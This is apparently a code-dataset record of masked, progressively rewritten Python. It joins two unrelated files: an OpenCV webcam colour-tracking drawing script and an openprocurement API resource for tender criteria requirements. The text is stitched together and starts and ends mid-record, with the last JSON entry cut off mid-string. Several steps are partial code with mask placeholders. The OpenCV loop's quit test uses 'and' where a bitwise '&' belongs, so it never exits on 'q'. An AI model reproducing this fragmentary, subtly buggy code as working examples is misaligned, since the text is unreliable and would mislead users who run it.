"step-2": "<mask token>\ncap.set(3, frameWidth)\ncap.set(4, frameHeight)\ncap.set(10, 150)\n<mask token>\n\n\ndef find_color(img, color_value, myColors):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n count = 0\n new_points = []\n for color in myColors:\n lower = np.array(color[0:3])\n upper = np.array(color[3:6])\n mask = cv2.inRange(hsv, lower, upper)\n x, y = contour_detect(mask)\n cv2.circle(frame_copy, (x, y), 20, color_value[count], -1)\n if x != 0 and y != 0:\n new_points.append([x, y, count])\n count += 1\n return new_points\n\n\ndef contour_detect(mask):\n x, y, w, h = 0, 0, 0, 0\n contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv2.contourArea(cnt)\n if area > 100:\n perimeter = cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, 0.01 * perimeter, True)\n x, y, w, h = cv2.boundingRect(approx)\n return x + w // 2, y\n\n\ndef canvas(my_points, color_value):\n for point in my_points:\n cv2.circle(frame_copy, (point[0], point[1]), 15, color_value[point[\n 2]], -1)\n\n\nwhile True:\n ret, frame = cap.read()\n frame = cv2.flip(frame, 1)\n frame_copy = frame.copy()\n new_point = find_color(frame, color_value, myColors)\n if len(new_point) != 0:\n for i in new_point:\n my_points.append(i)\n if len(my_points) != 0:\n canvas(my_points, color_value)\n cv2.imshow('frame', frame_copy)\n if cv2.waitKey(1) and 255 == ord('q'):\n break\ncv2.destroyAllWindows()\n",
"step-3": "<mask token>\nframeWidth = 640\nframeHeight = 480\ncap = cv2.VideoCapture(0)\ncap.set(3, frameWidth)\ncap.set(4, frameHeight)\ncap.set(10, 150)\nmyColors = [[20, 40, 40, 70, 255, 255], [100, 169, 121, 135, 255, 255], [0,\n 90, 90, 41, 255, 255]]\ncolor_value = [[255, 0, 0], [0, 255, 0], [14, 107, 237]]\nx, y, w, h = 0, 0, 0, 0\nmy_points = []\n\n\ndef find_color(img, color_value, myColors):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n count = 0\n new_points = []\n for color in myColors:\n lower = np.array(color[0:3])\n upper = np.array(color[3:6])\n mask = cv2.inRange(hsv, lower, upper)\n x, y = contour_detect(mask)\n cv2.circle(frame_copy, (x, y), 20, color_value[count], -1)\n if x != 0 and y != 0:\n new_points.append([x, y, count])\n count += 1\n return new_points\n\n\ndef contour_detect(mask):\n x, y, w, h = 0, 0, 0, 0\n contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv2.contourArea(cnt)\n if area > 100:\n perimeter = cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, 0.01 * perimeter, True)\n x, y, w, h = cv2.boundingRect(approx)\n return x + w // 2, y\n\n\ndef canvas(my_points, color_value):\n for point in my_points:\n cv2.circle(frame_copy, (point[0], point[1]), 15, color_value[point[\n 2]], -1)\n\n\nwhile True:\n ret, frame = cap.read()\n frame = cv2.flip(frame, 1)\n frame_copy = frame.copy()\n new_point = find_color(frame, color_value, myColors)\n if len(new_point) != 0:\n for i in new_point:\n my_points.append(i)\n if len(my_points) != 0:\n canvas(my_points, color_value)\n cv2.imshow('frame', frame_copy)\n if cv2.waitKey(1) and 255 == ord('q'):\n break\ncv2.destroyAllWindows()\n",
"step-4": "import cv2\nimport numpy as np\nframeWidth = 640\nframeHeight = 480\ncap = cv2.VideoCapture(0)\ncap.set(3, frameWidth)\ncap.set(4, frameHeight)\ncap.set(10, 150)\nmyColors = [[20, 40, 40, 70, 255, 255], [100, 169, 121, 135, 255, 255], [0,\n 90, 90, 41, 255, 255]]\ncolor_value = [[255, 0, 0], [0, 255, 0], [14, 107, 237]]\nx, y, w, h = 0, 0, 0, 0\nmy_points = []\n\n\ndef find_color(img, color_value, myColors):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n count = 0\n new_points = []\n for color in myColors:\n lower = np.array(color[0:3])\n upper = np.array(color[3:6])\n mask = cv2.inRange(hsv, lower, upper)\n x, y = contour_detect(mask)\n cv2.circle(frame_copy, (x, y), 20, color_value[count], -1)\n if x != 0 and y != 0:\n new_points.append([x, y, count])\n count += 1\n return new_points\n\n\ndef contour_detect(mask):\n x, y, w, h = 0, 0, 0, 0\n contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.\n CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv2.contourArea(cnt)\n if area > 100:\n perimeter = cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, 0.01 * perimeter, True)\n x, y, w, h = cv2.boundingRect(approx)\n return x + w // 2, y\n\n\ndef canvas(my_points, color_value):\n for point in my_points:\n cv2.circle(frame_copy, (point[0], point[1]), 15, color_value[point[\n 2]], -1)\n\n\nwhile True:\n ret, frame = cap.read()\n frame = cv2.flip(frame, 1)\n frame_copy = frame.copy()\n new_point = find_color(frame, color_value, myColors)\n if len(new_point) != 0:\n for i in new_point:\n my_points.append(i)\n if len(my_points) != 0:\n canvas(my_points, color_value)\n cv2.imshow('frame', frame_copy)\n if cv2.waitKey(1) and 255 == ord('q'):\n break\ncv2.destroyAllWindows()\n",
"step-5": "import cv2\nimport numpy as np\n\nframeWidth = 640\nframeHeight = 480\n\n# capturing Video from Webcam\ncap = cv2.VideoCapture(0)\ncap.set(3, frameWidth)\ncap.set(4, frameHeight)\n\ncap.set(10, 150)\n\nmyColors = [[20,40,40,70,255,255],\n [100,169,121,135,255,255],\n [0, 90, 90, 41, 255, 255]]\ncolor_value = [[255, 0, 0], [0, 255, 0], [14, 107, 237]]\nx, y, w, h = 0, 0, 0, 0\nmy_points = []\n\ndef find_color(img, color_value, myColors):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n count = 0\n new_points = []\n for color in myColors:\n lower = np.array(color[0:3])\n upper = np.array(color[3:6])\n mask = cv2.inRange(hsv, lower, upper)\n x, y = contour_detect(mask)\n\n cv2.circle(frame_copy, (x,y), 20,color_value[count], -1)\n if x != 0 and y != 0:\n new_points.append([x,y,count])\n count += 1\n return new_points\n\n\n\ndef contour_detect(mask):\n x,y,w,h = 0, 0, 0, 0\n contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv2.contourArea(cnt)\n if area > 100:\n perimeter = cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, 0.01*perimeter, True)\n x, y, w, h = cv2.boundingRect(approx)\n return x + w // 2, y\n\ndef canvas(my_points, color_value):\n for point in my_points:\n cv2.circle(frame_copy, (point[0], point[1]),\n 15, color_value[point[2]], -1)\n\n\nwhile True:\n\n ret, frame = cap.read()\n\n frame = cv2.flip(frame, 1)\n frame_copy = frame.copy()\n\n new_point = find_color(frame, color_value, myColors)\n if len(new_point) != 0:\n for i in new_point:\n my_points.append(i)\n if len(my_points) != 0:\n canvas(my_points, color_value)\n\n cv2.imshow('frame', frame_copy)\n if cv2.waitKey(1) and 0xFF == ord('q'):\n break\n\ncv2.destroyAllWindows()\n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class BaseTenderCriteriaRGRequirementResource(APIResource):
<|reserved_special_token_0|>
@json_view(permission='view_tender')
def collection_get(self):
return {'data': [i.serialize('view') for i in self.request.context.
requirements]}
<|reserved_special_token_0|>
@json_view(content_type='application/json', validators=(
validate_change_requirement_objects,
validate_patch_requirement_data), permission='edit_tender')
def patch(self):
requirement = self.request.context
apply_patch(self.request, save=False, src=requirement.serialize())
tender = self.request.validated['tender']
if self.request.authenticated_role == 'tender_owner' and hasattr(tender
, 'invalidate_bids_data'):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('Updated {}'.format(requirement.id), extra=
context_unpack(self.request, {'MESSAGE_ID':
'requirement_group_requirement_patch'}))
return {'data': requirement.serialize('view')}
@json_view(content_type='application/json', validators=(
validate_put_requirement_objects, validate_patch_requirement_data),
permission='edit_tender')
def put(self):
old_requirement = self.request.context
requirement = old_requirement
if self.request.validated['data'].get('status') != 'cancelled':
model = type(old_requirement)
data = copy(self.request.validated['data'])
for attr_name in type(old_requirement)._fields:
if data.get(attr_name) is None:
data[attr_name] = getattr(old_requirement, attr_name)
if 'eligibleEvidences' not in self.request.json.get('data', {}):
data['eligibleEvidences'] = [evidence.to_primitive(role=
'create') for evidence in getattr(old_requirement,
'eligibleEvidences')]
requirement = model(data)
if old_requirement.to_primitive() == requirement.to_primitive():
return {'data': (old_requirement.serialize('view'),)}
requirement.datePublished = get_now()
requirement.dateModified = None
self.request.validated['requirement_group'].requirements.append(
requirement)
if old_requirement.status == 'active':
old_requirement.status = 'cancelled'
old_requirement.dateModified = get_now()
tender = self.request.validated['tender']
if (self.request.authenticated_role == 'tender_owner' and tender.
status == 'active.tendering' and hasattr(tender,
'invalidate_bids_data')):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('New version of requirement {}'.format(
requirement.id), extra=context_unpack(self.request, {
'MESSAGE_ID': 'requirement_group_requirement_put'}))
return {'data': (requirement.serialize('view'), old_requirement
.serialize('view_old'))}
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BaseTenderCriteriaRGRequirementResource(APIResource):
@json_view(content_type='application/json', validators=(
validate_operation_ecriteria_objects,
validate_patch_exclusion_ecriteria_objects,
validate_requirement_data), permission='edit_tender')
def collection_post(self):
requirement = self.request.validated['requirement']
self.request.context.requirements.append(requirement)
tender = self.request.validated['tender']
if (self.request.authenticated_role == 'tender_owner' and tender.
status == 'active.tendering' and hasattr(tender,
'invalidate_bids_data')):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('Created requirement group requirement {}'.
format(requirement.id), extra=context_unpack(self.request,
{'MESSAGE_ID': 'requirement_group_requirement_create'}, {
'requirement_id': requirement.id}))
self.request.response.status = 201
self.request.response.headers['Location'] = self.request.route_url(
'{}:Requirement Group Requirement'.format(self.request.
validated['tender'].procurementMethodType), tender_id=self.
request.validated['tender_id'], criterion_id=self.request.
validated['criterion'].id, requirement_group_id=self.
request.validated['requirement_group'].id, requirement_id=
requirement.id)
return {'data': requirement.serialize('view')}
@json_view(permission='view_tender')
def collection_get(self):
return {'data': [i.serialize('view') for i in self.request.context.
requirements]}
<|reserved_special_token_0|>
@json_view(content_type='application/json', validators=(
validate_change_requirement_objects,
validate_patch_requirement_data), permission='edit_tender')
def patch(self):
requirement = self.request.context
apply_patch(self.request, save=False, src=requirement.serialize())
tender = self.request.validated['tender']
if self.request.authenticated_role == 'tender_owner' and hasattr(tender
, 'invalidate_bids_data'):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('Updated {}'.format(requirement.id), extra=
context_unpack(self.request, {'MESSAGE_ID':
'requirement_group_requirement_patch'}))
return {'data': requirement.serialize('view')}
@json_view(content_type='application/json', validators=(
validate_put_requirement_objects, validate_patch_requirement_data),
permission='edit_tender')
def put(self):
old_requirement = self.request.context
requirement = old_requirement
if self.request.validated['data'].get('status') != 'cancelled':
model = type(old_requirement)
data = copy(self.request.validated['data'])
for attr_name in type(old_requirement)._fields:
if data.get(attr_name) is None:
data[attr_name] = getattr(old_requirement, attr_name)
if 'eligibleEvidences' not in self.request.json.get('data', {}):
data['eligibleEvidences'] = [evidence.to_primitive(role=
'create') for evidence in getattr(old_requirement,
'eligibleEvidences')]
requirement = model(data)
if old_requirement.to_primitive() == requirement.to_primitive():
return {'data': (old_requirement.serialize('view'),)}
requirement.datePublished = get_now()
requirement.dateModified = None
self.request.validated['requirement_group'].requirements.append(
requirement)
if old_requirement.status == 'active':
old_requirement.status = 'cancelled'
old_requirement.dateModified = get_now()
tender = self.request.validated['tender']
if (self.request.authenticated_role == 'tender_owner' and tender.
status == 'active.tendering' and hasattr(tender,
'invalidate_bids_data')):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('New version of requirement {}'.format(
requirement.id), extra=context_unpack(self.request, {
'MESSAGE_ID': 'requirement_group_requirement_put'}))
return {'data': (requirement.serialize('view'), old_requirement
.serialize('view_old'))}
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BaseTenderCriteriaRGRequirementResource(APIResource):
@json_view(content_type='application/json', validators=(
validate_operation_ecriteria_objects,
validate_patch_exclusion_ecriteria_objects,
validate_requirement_data), permission='edit_tender')
def collection_post(self):
requirement = self.request.validated['requirement']
self.request.context.requirements.append(requirement)
tender = self.request.validated['tender']
if (self.request.authenticated_role == 'tender_owner' and tender.
status == 'active.tendering' and hasattr(tender,
'invalidate_bids_data')):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('Created requirement group requirement {}'.
format(requirement.id), extra=context_unpack(self.request,
{'MESSAGE_ID': 'requirement_group_requirement_create'}, {
'requirement_id': requirement.id}))
self.request.response.status = 201
self.request.response.headers['Location'] = self.request.route_url(
'{}:Requirement Group Requirement'.format(self.request.
validated['tender'].procurementMethodType), tender_id=self.
request.validated['tender_id'], criterion_id=self.request.
validated['criterion'].id, requirement_group_id=self.
request.validated['requirement_group'].id, requirement_id=
requirement.id)
return {'data': requirement.serialize('view')}
@json_view(permission='view_tender')
def collection_get(self):
return {'data': [i.serialize('view') for i in self.request.context.
requirements]}
@json_view(permission='view_tender')
def get(self):
return {'data': self.request.validated['requirement'].serialize('view')
}
@json_view(content_type='application/json', validators=(
validate_change_requirement_objects,
validate_patch_requirement_data), permission='edit_tender')
def patch(self):
requirement = self.request.context
apply_patch(self.request, save=False, src=requirement.serialize())
tender = self.request.validated['tender']
if self.request.authenticated_role == 'tender_owner' and hasattr(tender
, 'invalidate_bids_data'):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('Updated {}'.format(requirement.id), extra=
context_unpack(self.request, {'MESSAGE_ID':
'requirement_group_requirement_patch'}))
return {'data': requirement.serialize('view')}
@json_view(content_type='application/json', validators=(
validate_put_requirement_objects, validate_patch_requirement_data),
permission='edit_tender')
def put(self):
old_requirement = self.request.context
requirement = old_requirement
if self.request.validated['data'].get('status') != 'cancelled':
model = type(old_requirement)
data = copy(self.request.validated['data'])
for attr_name in type(old_requirement)._fields:
if data.get(attr_name) is None:
data[attr_name] = getattr(old_requirement, attr_name)
if 'eligibleEvidences' not in self.request.json.get('data', {}):
data['eligibleEvidences'] = [evidence.to_primitive(role=
'create') for evidence in getattr(old_requirement,
'eligibleEvidences')]
requirement = model(data)
if old_requirement.to_primitive() == requirement.to_primitive():
return {'data': (old_requirement.serialize('view'),)}
requirement.datePublished = get_now()
requirement.dateModified = None
self.request.validated['requirement_group'].requirements.append(
requirement)
if old_requirement.status == 'active':
old_requirement.status = 'cancelled'
old_requirement.dateModified = get_now()
tender = self.request.validated['tender']
if (self.request.authenticated_role == 'tender_owner' and tender.
status == 'active.tendering' and hasattr(tender,
'invalidate_bids_data')):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('New version of requirement {}'.format(
requirement.id), extra=context_unpack(self.request, {
'MESSAGE_ID': 'requirement_group_requirement_put'}))
return {'data': (requirement.serialize('view'), old_requirement
.serialize('view_old'))}
<|reserved_special_token_1|>
from copy import copy
from openprocurement.api.utils import json_view, context_unpack, APIResource, get_now
from openprocurement.tender.core.utils import save_tender, apply_patch
from openprocurement.tender.core.validation import validate_requirement_data, validate_patch_requirement_data, validate_operation_ecriteria_objects, validate_patch_exclusion_ecriteria_objects, validate_change_requirement_objects, validate_put_requirement_objects
class BaseTenderCriteriaRGRequirementResource(APIResource):
@json_view(content_type='application/json', validators=(
validate_operation_ecriteria_objects,
validate_patch_exclusion_ecriteria_objects,
validate_requirement_data), permission='edit_tender')
def collection_post(self):
requirement = self.request.validated['requirement']
self.request.context.requirements.append(requirement)
tender = self.request.validated['tender']
if (self.request.authenticated_role == 'tender_owner' and tender.
status == 'active.tendering' and hasattr(tender,
'invalidate_bids_data')):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('Created requirement group requirement {}'.
format(requirement.id), extra=context_unpack(self.request,
{'MESSAGE_ID': 'requirement_group_requirement_create'}, {
'requirement_id': requirement.id}))
self.request.response.status = 201
self.request.response.headers['Location'] = self.request.route_url(
'{}:Requirement Group Requirement'.format(self.request.
validated['tender'].procurementMethodType), tender_id=self.
request.validated['tender_id'], criterion_id=self.request.
validated['criterion'].id, requirement_group_id=self.
request.validated['requirement_group'].id, requirement_id=
requirement.id)
return {'data': requirement.serialize('view')}
@json_view(permission='view_tender')
def collection_get(self):
return {'data': [i.serialize('view') for i in self.request.context.
requirements]}
@json_view(permission='view_tender')
def get(self):
return {'data': self.request.validated['requirement'].serialize('view')
}
@json_view(content_type='application/json', validators=(
validate_change_requirement_objects,
validate_patch_requirement_data), permission='edit_tender')
def patch(self):
requirement = self.request.context
apply_patch(self.request, save=False, src=requirement.serialize())
tender = self.request.validated['tender']
if self.request.authenticated_role == 'tender_owner' and hasattr(tender
, 'invalidate_bids_data'):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('Updated {}'.format(requirement.id), extra=
context_unpack(self.request, {'MESSAGE_ID':
'requirement_group_requirement_patch'}))
return {'data': requirement.serialize('view')}
@json_view(content_type='application/json', validators=(
validate_put_requirement_objects, validate_patch_requirement_data),
permission='edit_tender')
def put(self):
old_requirement = self.request.context
requirement = old_requirement
if self.request.validated['data'].get('status') != 'cancelled':
model = type(old_requirement)
data = copy(self.request.validated['data'])
for attr_name in type(old_requirement)._fields:
if data.get(attr_name) is None:
data[attr_name] = getattr(old_requirement, attr_name)
if 'eligibleEvidences' not in self.request.json.get('data', {}):
data['eligibleEvidences'] = [evidence.to_primitive(role=
'create') for evidence in getattr(old_requirement,
'eligibleEvidences')]
requirement = model(data)
if old_requirement.to_primitive() == requirement.to_primitive():
return {'data': (old_requirement.serialize('view'),)}
requirement.datePublished = get_now()
requirement.dateModified = None
self.request.validated['requirement_group'].requirements.append(
requirement)
if old_requirement.status == 'active':
old_requirement.status = 'cancelled'
old_requirement.dateModified = get_now()
tender = self.request.validated['tender']
if (self.request.authenticated_role == 'tender_owner' and tender.
status == 'active.tendering' and hasattr(tender,
'invalidate_bids_data')):
tender.invalidate_bids_data()
if save_tender(self.request):
self.LOGGER.info('New version of requirement {}'.format(
requirement.id), extra=context_unpack(self.request, {
'MESSAGE_ID': 'requirement_group_requirement_put'}))
return {'data': (requirement.serialize('view'), old_requirement
.serialize('view_old'))}
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
from copy import copy
from openprocurement.api.utils import (
json_view,
context_unpack,
APIResource,
get_now,
)
from openprocurement.tender.core.utils import save_tender, apply_patch
from openprocurement.tender.core.validation import (
validate_requirement_data,
validate_patch_requirement_data,
validate_operation_ecriteria_objects,
validate_patch_exclusion_ecriteria_objects,
validate_change_requirement_objects,
validate_put_requirement_objects,
)
class BaseTenderCriteriaRGRequirementResource(APIResource):
    """CRUD endpoints for requirements inside a criterion's requirement group.

    Operates on ``/tenders/{id}/criteria/{cid}/requirement_groups/{rgid}/
    requirements``. POST/PATCH/PUT invalidate already-submitted bids where
    the tender supports it, and persist via ``save_tender``.
    """

    @json_view(
        content_type="application/json",
        validators=(
            validate_operation_ecriteria_objects,
            validate_patch_exclusion_ecriteria_objects,
            validate_requirement_data,
        ),
        permission="edit_tender"
    )
    def collection_post(self):
        """Add a new requirement to the requirement group.

        Returns 201 with a Location header on success; invalidates bids
        first when the tender is still in active.tendering.
        """
        requirement = self.request.validated["requirement"]
        self.request.context.requirements.append(requirement)

        tender = self.request.validated["tender"]
        if (
            self.request.authenticated_role == "tender_owner"
            and tender.status == "active.tendering"
            and hasattr(tender, "invalidate_bids_data")
        ):
            tender.invalidate_bids_data()

        if save_tender(self.request):
            self.LOGGER.info(
                "Created requirement group requirement {}".format(requirement.id),
                extra=context_unpack(
                    self.request,
                    {"MESSAGE_ID": "requirement_group_requirement_create"},
                    {"requirement_id": requirement.id},
                ),
            )
            self.request.response.status = 201
            self.request.response.headers["Location"] = self.request.route_url(
                "{}:Requirement Group Requirement".format(self.request.validated["tender"].procurementMethodType),
                tender_id=self.request.validated["tender_id"],
                criterion_id=self.request.validated["criterion"].id,
                requirement_group_id=self.request.validated["requirement_group"].id,
                requirement_id=requirement.id
            )
            return {"data": requirement.serialize("view")}

    @json_view(permission="view_tender")
    def collection_get(self):
        """List all requirements of the requirement group (view role)."""
        return {"data": [i.serialize("view") for i in self.request.context.requirements]}

    @json_view(permission="view_tender")
    def get(self):
        """Return a single requirement (view role)."""
        return {"data": self.request.validated["requirement"].serialize("view")}

    @json_view(
        content_type="application/json",
        validators=(
            validate_change_requirement_objects,
            validate_patch_requirement_data,
        ),
        permission="edit_tender"
    )
    def patch(self):
        """Partially update the requirement in place.

        NOTE(review): unlike collection_post/put, bids are invalidated here
        without checking ``tender.status == "active.tendering"`` -- confirm
        this asymmetry is intended.
        """
        requirement = self.request.context
        apply_patch(self.request, save=False, src=requirement.serialize())
        tender = self.request.validated["tender"]
        if self.request.authenticated_role == "tender_owner" and hasattr(tender, "invalidate_bids_data"):
            tender.invalidate_bids_data()

        if save_tender(self.request):
            self.LOGGER.info(
                "Updated {}".format(requirement.id),
                extra=context_unpack(self.request, {"MESSAGE_ID": "requirement_group_requirement_patch"}),
            )
            return {"data": requirement.serialize("view")}

    @json_view(
        content_type="application/json",
        validators=(
            validate_put_requirement_objects,
            validate_patch_requirement_data,
        ),
        permission="edit_tender"
    )
    def put(self):
        """Replace the requirement by publishing a new version of it.

        Unless the payload sets status "cancelled", a new requirement is
        built from the payload merged over the old one's fields, appended
        to the group, and the old one is cancelled. A no-op payload (equal
        primitives) short-circuits and returns the old version unchanged.
        Returns a (new, old) pair on success.
        """
        old_requirement = self.request.context
        requirement = old_requirement
        if self.request.validated["data"].get("status") != "cancelled":
            model = type(old_requirement)
            # Shallow-merge: fields absent from the payload keep the old
            # requirement's values.
            data = copy(self.request.validated["data"])
            for attr_name in type(old_requirement)._fields:
                if data.get(attr_name) is None:
                    data[attr_name] = getattr(old_requirement, attr_name)
            # To avoid new version creation if no changes and only id's were regenerated
            if "eligibleEvidences" not in self.request.json.get("data", {}):
                data["eligibleEvidences"] = [
                    evidence.to_primitive(role="create") for evidence in getattr(old_requirement, "eligibleEvidences")
                ]

            requirement = model(data)
            if old_requirement.to_primitive() == requirement.to_primitive():
                return {"data": (old_requirement.serialize("view"),)}

            requirement.datePublished = get_now()
            requirement.dateModified = None
            self.request.validated["requirement_group"].requirements.append(requirement)

        if old_requirement.status == "active":
            old_requirement.status = "cancelled"
            old_requirement.dateModified = get_now()

        tender = self.request.validated["tender"]
        if (
            self.request.authenticated_role == "tender_owner"
            and tender.status == "active.tendering"
            and hasattr(tender, "invalidate_bids_data")
        ):
            tender.invalidate_bids_data()
        if save_tender(self.request):
            self.LOGGER.info(
                "New version of requirement {}".format(requirement.id),
                extra=context_unpack(self.request, {"MESSAGE_ID": "requirement_group_requirement_put"}),
            )
            return {"data": (requirement.serialize("view"), old_requirement.serialize("view_old"))}
|
flexible
|
{
"blob_id": "6194079dd506553b4e5b66f1fb92bb8642704b59",
"index": 6893,
"step-1": "<mask token>\n\n\nclass BaseTenderCriteriaRGRequirementResource(APIResource):\n <mask token>\n\n @json_view(permission='view_tender')\n def collection_get(self):\n return {'data': [i.serialize('view') for i in self.request.context.\n requirements]}\n <mask token>\n\n @json_view(content_type='application/json', validators=(\n validate_change_requirement_objects,\n validate_patch_requirement_data), permission='edit_tender')\n def patch(self):\n requirement = self.request.context\n apply_patch(self.request, save=False, src=requirement.serialize())\n tender = self.request.validated['tender']\n if self.request.authenticated_role == 'tender_owner' and hasattr(tender\n , 'invalidate_bids_data'):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('Updated {}'.format(requirement.id), extra=\n context_unpack(self.request, {'MESSAGE_ID':\n 'requirement_group_requirement_patch'}))\n return {'data': requirement.serialize('view')}\n\n @json_view(content_type='application/json', validators=(\n validate_put_requirement_objects, validate_patch_requirement_data),\n permission='edit_tender')\n def put(self):\n old_requirement = self.request.context\n requirement = old_requirement\n if self.request.validated['data'].get('status') != 'cancelled':\n model = type(old_requirement)\n data = copy(self.request.validated['data'])\n for attr_name in type(old_requirement)._fields:\n if data.get(attr_name) is None:\n data[attr_name] = getattr(old_requirement, attr_name)\n if 'eligibleEvidences' not in self.request.json.get('data', {}):\n data['eligibleEvidences'] = [evidence.to_primitive(role=\n 'create') for evidence in getattr(old_requirement,\n 'eligibleEvidences')]\n requirement = model(data)\n if old_requirement.to_primitive() == requirement.to_primitive():\n return {'data': (old_requirement.serialize('view'),)}\n requirement.datePublished = get_now()\n requirement.dateModified = None\n 
self.request.validated['requirement_group'].requirements.append(\n requirement)\n if old_requirement.status == 'active':\n old_requirement.status = 'cancelled'\n old_requirement.dateModified = get_now()\n tender = self.request.validated['tender']\n if (self.request.authenticated_role == 'tender_owner' and tender.\n status == 'active.tendering' and hasattr(tender,\n 'invalidate_bids_data')):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('New version of requirement {}'.format(\n requirement.id), extra=context_unpack(self.request, {\n 'MESSAGE_ID': 'requirement_group_requirement_put'}))\n return {'data': (requirement.serialize('view'), old_requirement\n .serialize('view_old'))}\n",
"step-2": "<mask token>\n\n\nclass BaseTenderCriteriaRGRequirementResource(APIResource):\n\n @json_view(content_type='application/json', validators=(\n validate_operation_ecriteria_objects,\n validate_patch_exclusion_ecriteria_objects,\n validate_requirement_data), permission='edit_tender')\n def collection_post(self):\n requirement = self.request.validated['requirement']\n self.request.context.requirements.append(requirement)\n tender = self.request.validated['tender']\n if (self.request.authenticated_role == 'tender_owner' and tender.\n status == 'active.tendering' and hasattr(tender,\n 'invalidate_bids_data')):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('Created requirement group requirement {}'.\n format(requirement.id), extra=context_unpack(self.request,\n {'MESSAGE_ID': 'requirement_group_requirement_create'}, {\n 'requirement_id': requirement.id}))\n self.request.response.status = 201\n self.request.response.headers['Location'] = self.request.route_url(\n '{}:Requirement Group Requirement'.format(self.request.\n validated['tender'].procurementMethodType), tender_id=self.\n request.validated['tender_id'], criterion_id=self.request.\n validated['criterion'].id, requirement_group_id=self.\n request.validated['requirement_group'].id, requirement_id=\n requirement.id)\n return {'data': requirement.serialize('view')}\n\n @json_view(permission='view_tender')\n def collection_get(self):\n return {'data': [i.serialize('view') for i in self.request.context.\n requirements]}\n <mask token>\n\n @json_view(content_type='application/json', validators=(\n validate_change_requirement_objects,\n validate_patch_requirement_data), permission='edit_tender')\n def patch(self):\n requirement = self.request.context\n apply_patch(self.request, save=False, src=requirement.serialize())\n tender = self.request.validated['tender']\n if self.request.authenticated_role == 'tender_owner' and hasattr(tender\n , 'invalidate_bids_data'):\n 
tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('Updated {}'.format(requirement.id), extra=\n context_unpack(self.request, {'MESSAGE_ID':\n 'requirement_group_requirement_patch'}))\n return {'data': requirement.serialize('view')}\n\n @json_view(content_type='application/json', validators=(\n validate_put_requirement_objects, validate_patch_requirement_data),\n permission='edit_tender')\n def put(self):\n old_requirement = self.request.context\n requirement = old_requirement\n if self.request.validated['data'].get('status') != 'cancelled':\n model = type(old_requirement)\n data = copy(self.request.validated['data'])\n for attr_name in type(old_requirement)._fields:\n if data.get(attr_name) is None:\n data[attr_name] = getattr(old_requirement, attr_name)\n if 'eligibleEvidences' not in self.request.json.get('data', {}):\n data['eligibleEvidences'] = [evidence.to_primitive(role=\n 'create') for evidence in getattr(old_requirement,\n 'eligibleEvidences')]\n requirement = model(data)\n if old_requirement.to_primitive() == requirement.to_primitive():\n return {'data': (old_requirement.serialize('view'),)}\n requirement.datePublished = get_now()\n requirement.dateModified = None\n self.request.validated['requirement_group'].requirements.append(\n requirement)\n if old_requirement.status == 'active':\n old_requirement.status = 'cancelled'\n old_requirement.dateModified = get_now()\n tender = self.request.validated['tender']\n if (self.request.authenticated_role == 'tender_owner' and tender.\n status == 'active.tendering' and hasattr(tender,\n 'invalidate_bids_data')):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('New version of requirement {}'.format(\n requirement.id), extra=context_unpack(self.request, {\n 'MESSAGE_ID': 'requirement_group_requirement_put'}))\n return {'data': (requirement.serialize('view'), old_requirement\n .serialize('view_old'))}\n",
"step-3": "<mask token>\n\n\nclass BaseTenderCriteriaRGRequirementResource(APIResource):\n\n @json_view(content_type='application/json', validators=(\n validate_operation_ecriteria_objects,\n validate_patch_exclusion_ecriteria_objects,\n validate_requirement_data), permission='edit_tender')\n def collection_post(self):\n requirement = self.request.validated['requirement']\n self.request.context.requirements.append(requirement)\n tender = self.request.validated['tender']\n if (self.request.authenticated_role == 'tender_owner' and tender.\n status == 'active.tendering' and hasattr(tender,\n 'invalidate_bids_data')):\n tender.invalidate_bids_data()\n if save_tender(self.request):\n self.LOGGER.info('Created requirement group requirement {}'.\n format(requirement.id), extra=context_unpack(self.request,\n {'MESSAGE_ID': 'requirement_group_requirement_create'}, {\n 'requirement_id': requirement.id}))\n self.request.response.status = 201\n self.request.response.headers['Location'] = self.request.route_url(\n '{}:Requirement Group Requirement'.format(self.request.\n validated['tender'].procurementMethodType), tender_id=self.\n request.validated['tender_id'], criterion_id=self.request.\n validated['criterion'].id, requirement_group_id=self.\n request.validated['requirement_group'].id, requirement_id=\n requirement.id)\n return {'data': requirement.serialize('view')}\n\n @json_view(permission='view_tender')\n def collection_get(self):\n return {'data': [i.serialize('view') for i in 